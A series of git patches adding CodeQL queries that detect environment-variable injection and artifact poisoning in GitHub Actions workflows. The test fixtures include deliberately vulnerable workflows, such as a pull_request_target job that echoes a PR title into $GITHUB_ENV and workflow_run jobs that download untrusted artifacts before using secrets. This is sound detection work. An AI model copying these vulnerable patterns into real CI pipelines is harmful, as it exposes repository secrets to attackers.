822e9bcaab1357c734654d200790bab4b2175bc8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 23 Mar 2024 21:55:49 +0100 Subject: [PATCH 0137/1267] env var injection query --- .../actions/security/EnvVarInjectionQuery.qll | 36 +++++++++ ql/src/Security/CWE-077/EnvVarInjection.ql | 23 ++++++ .../CWE-077/PrivilegedEnvVarInjection.ql | 26 +++++++ .../CWE-077/.github/workflows/test1.yml | 25 +++++++ .../CWE-077/.github/workflows/test2.yml | 73 +++++++++++++++++++ .../CWE-077/.github/workflows/test3.yml | 64 ++++++++++++++++ .../Security/CWE-077/EnvVarInjection.qlref | 1 + .../CWE-077/PrivilegedEnvVarInjection.qlref | 1 + .../CWE-094/.github/workflows/inter-job0.yml | 4 +- 9 files changed, 251 insertions(+), 2 deletions(-) create mode 100644 ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll create mode 100644 ql/src/Security/CWE-077/EnvVarInjection.ql create mode 100644 ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll new file mode 100644 index 00000000000..dbae3f48f80 --- /dev/null +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -0,0 +1,36 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +predicate writeToGithubEnvSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string script, string line, string value | + script = run.getScript() and + line = script.splitAt("\n") and + value = line.regexpCapture("echo\\s+.*\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) +} + +private class EnvVarInjectionSink extends DataFlow::Node { + EnvVarInjectionSink() { + writeToGithubEnvSink(this) or + externallyDefinedSink(this, "envvar-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module EnvVarInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ +module EnvVarInjectionFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql new file mode 100644 index 00000000000..2e978ad9e53 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -0,0 +1,23 @@ +/** + * @name Enviroment Variable built from user-controlled sources + * @description Building an environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/envvar-injection + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvVarInjectionQuery +import EnvVarInjectionFlow::PathGraph + +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink +where EnvVarInjectionFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql new file mode 100644 index 00000000000..bce9494a43f --- /dev/null +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -0,0 +1,26 @@ +/** + * @name Enviroment Variable built from user-controlled sources + * @description Building an environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/privileged-envvar-injection + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvVarInjectionQuery +import EnvVarInjectionFlow::PathGraph + +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w +where + EnvVarInjectionFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) +select sink.getNode(), source, sink, + "Potential privileged environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml new file mode 100644 index 00000000000..b2780d54c04 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml new file mode 100644 index 00000000000..e71178c4ad6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -0,0 +1,73 @@ +# https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0 +# https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1 +name: Deploy Preview +on: + workflow_run: + workflows: ["Generate Preview"] + types: + - completed + +jobs: + deploy: + runs-on: ubuntu-latest + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr" + })[0]; + var matchPreviewArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "preview" + })[0]; + var downloadPr = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPrArtifact.id, + archive_format: 'zip', + }); + var downloadPreview = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPreviewArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); + fs.writeFileSync('${{github.workspace}}/firestore-web.zip', Buffer.from(downloadPreview.data)); + - run: | + unzip pr.zip + echo "pr_number=$(cat NR)" >> $GITHUB_ENV + mkdir firestore-web + unzip firestore-web.zip -d firestore-web + - name: Deploy preview + id: deploy_preview + uses: FirebaseExtended/action-hosting-deploy@v0 + with: + repoToken: '${{ secrets.GITHUB_TOKEN }}' + firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_FIR_CODELABS_89252 }}' + projectId: fir-codelabs-89252 + entryPoint: firestore-web + channelId: firestore-web-${{ env.pr_number }} + env: + FIREBASE_CLI_PREVIEWS: hostingchannels + - name: Write Comment + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: ${{ env.pr_number }}, + body: 'View preview ${{ steps.deploy_preview.outputs.details_url }}' + }); diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml new file mode 100644 index 00000000000..2f76d4a3042 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -0,0 +1,64 @@ +# https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project +# https://github.com/google/orbit/commit/6cd71a3f1eec098d0de61bf9bb742737cb3aa5fa +name: report-checks +on: + workflow_run: + workflows: ['checks'] + types: + - completed +permissions: read-all +jobs: + + report-clang-tidy-diff: + permissions: + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Download PR metadata + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: pr_metadata + if_no_artifact_found: 'ignore' + - name: Download clang_tidy_fixes + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: clang_tidy_fixes + if_no_artifact_found: 'ignore' + - name: Set found_files + id: set_found_files + run: | + if [ -f clang-tidy-fixes.yml ] && [ -f pr_number.txt ] && [ -f pr_head_repo.txt ] && [ -f pr_head_ref.txt ]; then + echo "found_files=true" >> $GITHUB_OUTPUT + else + echo "found_files=false" >> $GITHUB_OUTPUT + fi + - run: | + echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV + echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV + if: steps.set_found_files.outputs.found_files == 'true' + - uses: actions/checkout@v3 + if: steps.set_found_files.outputs.found_files == 'true' + with: + repository: ${{ env.PR_HEAD_REPO }} + ref: ${{ env.PR_HEAD_REF }} + persist-credentials: false + - name: Redownload clang_tidy_fixes + if: steps.set_found_files.outputs.found_files == 'true' + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: clang_tidy_fixes + if_no_artifact_found: 'ignore' + - uses: platisd/clang-tidy-pr-comments@89ea1b828cdac1a6ec993d225972adea3b8841b6 + if: steps.set_found_files.outputs.found_files == 'true' + with: + github_token: ${{ secrets.ORBITPROFILER_BOT_PAT }} + clang_tidy_fixes: clang-tidy-fixes.yml + pull_request_id: ${{ env.PR_NUMBER }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref new file mode 100644 index 00000000000..dafc2b38fc4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref new file mode 100644 index 00000000000..4562004b990 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/PrivilegedEnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 5ad00b17db9..d656fb65ea5 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -1,4 +1,4 @@ -jn: push +on: push jobs: job0: @@ -36,7 +36,7 @@ jobs: if: ${{ always() }} - needs: job1 + needs: job steps: - id: sink From bdfd46111fb7823a61113045af6bda60031748bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:51:26 +0200 Subject: [PATCH 0138/1267] Only triggered on non-pull_request events --- ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index bce9494a43f..6508b458629 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,11 +16,16 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w where EnvVarInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 9807cf87d52df816ec38ba35833687b4abf6ef12 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:52:46 +0200 Subject: [PATCH 0139/1267] resolve conflicts --- ql/lib/ext/trilom_file-changes-action.model.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 ql/lib/ext/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml new file mode 100644 index 00000000000..db3d3759782 --- /dev/null +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/trilom/file-changes-action + # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` + - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] From cc16318a9062fd05027fe4827d25bd9d84b0c7e3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:56:03 +0200 Subject: [PATCH 0140/1267] Make new trilom source compliant with new sources --- ql/lib/ext/trilom_file-changes-action.model.yml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index db3d3759782..77706e266fe 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -3,9 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - # https://github.com/trilom/file-changes-action - # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` - - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files"] From 152d29da3859d054b46eb09f17a17b849fa79cd9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 18:53:37 +0200 Subject: [PATCH 0141/1267] Add Artifact poisoning and Env Injection queries --- ql/lib/codeql/actions/Ast.qll | 6 ++- ql/lib/codeql/actions/ast/internal/Ast.qll | 26 ++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 10 ++-- .../dataflow/internal/DataFlowPrivate.qll | 20 +++++++- .../security/ArtifactPoisoningQuery.qll | 50 +++++++++++++++++++ .../actions/security/EnvVarInjectionQuery.qll | 11 ++-- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 26 ++++++++++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 2 +- .../CWE-077/.github/workflows/test1.yml | 2 + .../Security/CWE-077/EnvVarInjection.expected | 6 +++ .../PrivilegedEnvVarInjection.expected | 6 +++ .../CWE-094/.github/workflows/inter-job0.yml | 2 +- .../CWE-094/.github/workflows/test1.yml | 27 ++++++++++ .../Security/CWE-094/CodeInjection.expected | 6 +++ .../CWE-094/PrivilegedCodeInjection.expected | 6 +++ .../.github/workflows/artifactpoisoning1.yml | 34 +++++++++++++ .../.github/workflows/artifactpoisoning2.yml | 21 ++++++++ .../.github/workflows/artifactpoisoning3.yml | 19 +++++++ .../.github/workflows/artifactpoisoning4.yml | 25 ++++++++++ .../CWE-829/.github/workflows/test1.yml | 27 ++++++++++ .../CWE-829/ArtifactPoisoning.expected | 4 ++ .../Security/CWE-829/ArtifactPoisoning.qlref | 2 + .../CWE-829/UnpinnedActionsTag.expected | 1 + 23 files changed, 313 insertions(+), 26 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ecc0ad16f5f..d865eb54905 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -38,7 +38,9 @@ class AstNode instanceof AstNodeImpl { Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } -class ScalarValue extends AstNode instanceof ScalarValueImpl { } +class ScalarValue extends AstNode instanceof ScalarValueImpl { + string getValue() { result = super.getValue() } +} class Expression extends AstNode instanceof ExpressionImpl { string expression; @@ -218,6 +220,8 @@ abstract class Uses extends AstNode instanceof UsesImpl { string getVersion() { result = super.getVersion() } + string getArgument(string argName) { result = super.getArgument(argName) } + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 3fa1769e762..a1470a41dd0 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -128,6 +128,8 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { override Location getLocation() { result = value.getLocation() } override YamlScalar getNode() { result = value } + + string getValue() { result = value.getValue() } } class ExpressionImpl extends AstNodeImpl, TExpressionNode { @@ -687,7 +689,19 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); - abstract ExpressionImpl getArgumentExpr(string key); + /** Gets the argument expression for the given key. */ + string getArgument(string key) { + exists(ScalarValueImpl scalar | + scalar.getNode() = this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) and + result = scalar.getValue() + ) + } + + /** Gets the argument expression for the given key (if it exists). */ + ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = + this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) + } } /** @@ -719,11 +733,6 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } - /** Gets the argument expression for the given key. */ - override ExpressionImpl getArgumentExpr(string key) { - result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) - } - override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } @@ -763,11 +772,6 @@ class ExternalJobImpl extends JobImpl, UsesImpl { else none() ) } - - /** Gets the argument expression for the given key. */ - override ExpressionImpl getArgumentExpr(string key) { - result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) - } } class RunImpl extends StepImpl { diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index c10334436aa..34357816812 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -33,12 +33,12 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ -predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run r, string varName, string output | +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getInScopeEnvVarExpr(varName) = pred.asExpr() and + run.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript() and + script = run.getScript() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or @@ -46,6 +46,6 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data ) and line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and - succ.asExpr() = r + succ.asExpr() = run ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 11b8bf94bca..b5123069f13 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -232,8 +232,24 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) + or astTo.getTarget() = astFrom + or + // e.g: + // - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + // - run: echo ${{ env.ISSUE_KEY }} + exists(Run run, string script, Expression expr, string line, string key, string value | + run.getScript() = script and + run.getAnScriptExpr() = expr and + line = script.splitAt("\n") and + key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + value.indexOf(expr.getRawExpression()) > 0 and + key = astTo.getFieldName() and + expr = astFrom and + expr.getEnclosingWorkflow() = run.getEnclosingWorkflow() + ) ) ) } @@ -312,7 +328,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or externallyDefinedStoreStep(node1, node2, c) or - runEnvToScriptStoreStep(node1, node2, c) + envToOutputStoreStep(node1, node2, c) } /** diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll new file mode 100644 index 00000000000..abf36fd7da3 --- /dev/null +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -0,0 +1,50 @@ +import actions + +class ArtifactDownloadStep extends Step { + ArtifactDownloadStep() { + // eg: - uses: dawidd6/action-download-artifact@v2 + this.(UsesStep).getCallee() = "dawidd6/action-download-artifact" and + // exclude downloads outside the current directory + // TODO: add more checks to make sure the artifacts can be controlled + not exists(this.(UsesStep).getArgumentExpr("path")) + or + // eg: + // - uses: actions/github-script@v6 + // with: + // script: | + // let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + // owner: context.repo.owner, + // repo: context.repo.repo, + // run_id: context.payload.workflow_run.id, + // }); + // let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + // return artifact.name == "" + // })[0]; + // let download = await github.rest.actions.downloadArtifact({ + // owner: context.repo.owner, + // repo: context.repo.repo, + // artifact_id: matchArtifact.id, + // archive_format: 'zip', + // }); + this.(UsesStep).getCallee() = "actions/github-script" and + exists(string script | + this.(UsesStep).getArgument("script") = script and + script.matches("%listWorkflowRunArtifacts(%") and + script.matches("%downloadArtifact(%") + ) + or + // eg: - run: gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + this.(Run).getScript().splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") + or + // eg: + // run: | + // artifacts_url=${{ github.event.workflow_run.artifacts_url }} + // gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + // do + // IFS=$'\t' read name url <<< "$artifact" + // gh api $url > "$name.zip" + // unzip -d "$name" "$name.zip" + // done + this.(Run).getScript().splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") + } +} diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index dbae3f48f80..330920852c1 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -4,12 +4,13 @@ private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow -predicate writeToGithubEnvSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string script, string line, string value | +predicate writeToGithubEnvSink(DataFlow::Node exprNode, string key, string value) { + exists(Expression expr, Run run, string script, string line | script = run.getScript() and line = script.splitAt("\n") and - value = line.regexpCapture("echo\\s+.*\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - expr = sink.asExpr() and + key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + expr = exprNode.asExpr() and run.getAnScriptExpr() = expr and value.indexOf(expr.getRawExpression()) > 0 ) @@ -17,7 +18,7 @@ predicate writeToGithubEnvSink(DataFlow::Node sink) { private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - writeToGithubEnvSink(this) or + writeToGithubEnvSink(this, _, _) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql new file mode 100644 index 00000000000..5b0c4fc4e69 --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -0,0 +1,26 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 9.3 + * @id actions/artifact-poisoning + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery + +from LocalJob job, ArtifactDownloadStep download, Step run +where + job.getWorkflow().getATriggerEvent() = "workflow_run" and + (run instanceof Run or run instanceof UsesStep) and + exists(int i, int j | + job.getStep(i) = download and + job.getStep(j) = run and + i < j + ) +select download, "Potential artifact poisoning." diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index b33c7325526..86b80c67215 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -5,7 +5,7 @@ * that is able to push to the base repository and to access secrets. * @kind problem * @problem.severity warning - * @precision low + * @precision medium * @security-severity 9.3 * @id actions/untrusted-checkout * @tags actions diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index b2780d54c04..3cab86f3171 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -21,5 +21,7 @@ jobs: - name: Extract Jira Key run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Sink + run: echo ${{ env.ISSUE_KEY }} diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected new file mode 100644 index 00000000000..2d96ec5a435 --- /dev/null +++ 